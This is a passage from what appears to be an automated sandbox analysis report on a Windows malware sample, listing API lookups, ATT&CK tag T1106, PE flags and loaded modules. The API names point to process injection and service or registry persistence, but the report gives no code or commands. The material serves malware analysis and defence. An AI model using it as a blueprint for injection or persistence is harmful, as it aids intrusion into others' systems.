00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001072)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00003564)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005392)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00005392)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00005312)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00005312)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jwifylqa.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"KERNEL32.DLL\" at base 75630000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"WS2_32.DLL\" at base 75b90000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"DBGHELP.DLL\" at base 6f1d0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"USER32.DLL\" at base 76d10000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"ADVAPI32.DLL\" at base 768d0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"SHELL32.DLL\" at base 75c80000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"OLEAUT32.DLL\" at base 75020000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"MSVCR100.DLL\" at base 69ff0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"NTDLL.DLL\" at base 76de0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" 